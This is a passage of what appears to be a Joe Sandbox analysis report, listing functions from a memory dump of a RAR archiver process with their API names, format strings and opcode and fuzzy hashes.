                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                              • String ID:
                                                              • API String ID: 932687459-0
                                                              • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                              • Instruction ID: e47d122730c5fb61b95e523df646dc80272f3c62c84821ca7ec23d40b625ed39
                                                              • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                              • Instruction Fuzzy Hash: BC81E422A0C68A85FF109F21E9603BF6350FBC6B85F185131DB4D97A99DF3CE445AB02
                                                              Function 00007FF629B51ADC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: +$-
                                                              • API String ID: 3215553584-2137968064
                                                              • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                              • Instruction ID: d50bb3b693d35b9e3ed0041767a7bc0ea949fefd833f9ea7182074e93aed41e8
                                                              • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                              • Instruction Fuzzy Hash: DA12E826E0A18B46FF249E15D8442BF3295EF92766FDC8232C699C76C0DF2CE541E706
                                                              Function 00007FF629B3BC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                              • Instruction ID: ac8c86bf2aec8f709fae51651ca17d457a0e9166fe9a6b101d1bb309740dbd93
                                                              • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                              • Instruction Fuzzy Hash: D6518AB2B146568BEB54CFB5D8401ED37B0FB49B89B50403ADE0E96B58DF38E545CB00
                                                              Function 00007FF629B3C254 Relevance: 9.1, APIs: 6, Instructions: 81timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                              • Instruction ID: 6e0605a91cd67f373a828e13fc40abac73204d5656f16f4e4c9350ebefea8492
                                                              • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                              • Instruction Fuzzy Hash: 84315962B146568AFB00CFF5D8801BD3770FF49B49B14502AEE0E97A68EF38E895D305
                                                              Function 00007FF629B2EB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: exe$rar$rebuilt.$sfx
                                                              • API String ID: 0-13699710
                                                              • Opcode ID: 0b1da9e657f7261bdb3f462eb1dbe221dfbeb346c67af24014c3732231eefe35
                                                              • Instruction ID: 16cd526d464b6dbbf267b04ca49db67c52dbed27eea0df154ba14f21d67cd2ed
                                                              • Opcode Fuzzy Hash: 0b1da9e657f7261bdb3f462eb1dbe221dfbeb346c67af24014c3732231eefe35
                                                              • Instruction Fuzzy Hash: 0D818325E0C68A85EE20EE65DC112FE2392FBC7785F404135D94D8BACADE3DE605E702
                                                              Function 00007FF629B4E0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwindabort
                                                              • String ID: csm$f
                                                              • API String ID: 3913153233-629598281
                                                              • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                              • Instruction ID: e221170113bfe57bb5ed383bcc335faae9d232d70cb8df655556285c31cb5762
                                                              • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                              • Instruction Fuzzy Hash: 7361B33AA0964A86EF14DF51E854A7F3791FB86785F149530DE0A87744DF38E841AB02
                                                              Function 00007FF629B0EA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Security$File$DescriptorLength
                                                              • String ID: $ACL
                                                              • API String ID: 2361174398-1852320022
                                                              • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                              • Instruction ID: 8e220389e53fd84f848434f17a4e3bf8d2820241e6cfd0866236367e8cf58aeb
                                                              • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                              • Instruction Fuzzy Hash: 43316061A19A8692EF24DF11ED503EE73A4FBCA785F804035DA8D83696DF3CE605D702
                                                              Function 00007FF629B3BE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Time$File$swprintf$LocalSystem
                                                              • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                              • API String ID: 1364621626-1794493780
                                                              • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                              • Instruction ID: 66fdf3babcfc0dbd2e701f0aa7e8fd79add9bfa57d762e997f1e357f1d88fd83
                                                              • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                              • Instruction Fuzzy Hash: 4E210676A182558FEB50DF68D880AAE77F0F788788F144026EE48D3B08DF39E8408F50
                                                              Function 00007FF629B57AB4 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                              • Instruction ID: 629a2b2ea26a721b0c842356e1c7196edc9ed2b98b413abaf2170354e4f8a3e9
                                                              • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                              • Instruction Fuzzy Hash: F781C162B1864A89FF209F65CCC06BE27A1BB8679AF404135DD0E93B95DF3CA441E712
                                                              Function 00007FF629B080C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                              • String ID:
                                                              • API String ID: 643171463-0
                                                              • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                              • Instruction ID: 9621b2d8ca2b74d2d90a6c204c54e1088689762348cd09ee9479447fb63b92bb
                                                              • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                              • Instruction Fuzzy Hash: 8441B521E0964A42FE109F61DD102BF6251AFCB7A2F040335E96D9B7D1DE3CE545E702
                                                              Function 00007FF629B569B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                              • Instruction ID: 39e717e26df58c6f5d97155213978a190563dfa750a56ffadcf9ecd67f03b602
                                                              • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                              • Instruction Fuzzy Hash: 2741B462B09A4ED1FE55AF26DC006BB7291BF86B91F098535DD1DCB794EE3CE400A342
                                                              Function 00007FF629B5DC20 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                              • Instruction ID: cb34aad0e9304225d749fd67ee830f7be9a9995d87f8f71cdec8656515274942
                                                              • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                              • Instruction Fuzzy Hash: 7F115476E1860B15FE545A28EC8637F15416FD7362E484734E97EC66E6CEACA440B203
                                                              Function 00007FF629B16FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: swprintf
                                                              • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                              • API String ID: 233258989-622958660
                                                              • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                              • Instruction ID: ccbfbc06f3add25b52bf49d4df92f9a53ae070ca5d5632766dfea3493207f537
                                                              • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                              • Instruction Fuzzy Hash: BA515CF3F3C6448AE7648F1CEC81BA92690F3A6B91F545A24F94AD3B54CA3DDA05C701
                                                              Function 00007FF629B06E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: wcschr
                                                              • String ID: MCAOmcao$MCAOmcao
                                                              • API String ID: 1497570035-1725859250
                                                              • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                              • Instruction ID: dcb18c7fe7364fc7997bb2bf203ec9988e6265df2bddaf9153e64e5e8a907ab7
                                                              • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
